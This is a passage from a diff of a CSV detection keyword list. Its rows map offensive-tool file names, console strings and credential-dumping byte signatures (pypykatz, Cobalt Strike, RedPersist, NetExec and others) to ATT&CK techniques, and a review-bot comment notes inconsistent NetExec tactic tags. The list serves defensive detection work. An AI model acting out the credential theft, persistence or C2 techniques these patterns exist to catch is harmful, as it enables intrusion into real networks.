Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" 
+"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*\x44\x8b\x01\x44\x39\x42*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\x64\Release\indirect.exe *","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" "*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\x8b\x31\x39\x72\x10\x75*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
"*\XOR_b64_encrypted\*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*\xorencrypt.py*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Found non-ASCII service: 
*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Screensaver Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] Startup Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Found non-ASCII service: *","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Screensaver Persistence 
created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Startup Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - 
TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" 
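Review bot: Every NetExec row added in this hunk has `metadata_category` set to `Credential Access`, but its tactics column reads `TA0007 - TA0003 - TA0002 - TA0001`, which omits TA0006, the Credential Access tactic. The same technique list, `T1069 - T1021 - T1136 - T1018`, is also copied onto every module, so rows such as `*\whoami.py*` and `*\zerologon.py*` are labelled identically to `*\wdigest.py*` and `*\winscp_dump.py*`. The NetExec rows in the two earlier hunks (`*\uac.py*`, `*\veeam_dump.py*`) follow the same pattern. For the modules whose names suggest credential dumping, I would write the tactics as `"TA0007 - TA0006 - TA0003 - TA0002 - TA0001"`, and give the remaining modules a category that reflects what each one does, after checking that against the NetExec source. Detections built on these columns inherit the mapping, so a mismatch here becomes wrong ATT&CK tagging on the resulting alerts.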
@@ -6539,71 +6682,71 @@ "*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_adAclOutput*.xlsx*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_backdoor.exe*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*_dcsync.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
-"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*_dump_users.lst*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" -"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*_EvilClippy.*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*_find_sharpgen_dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*_GetNetLoggedon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
-"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 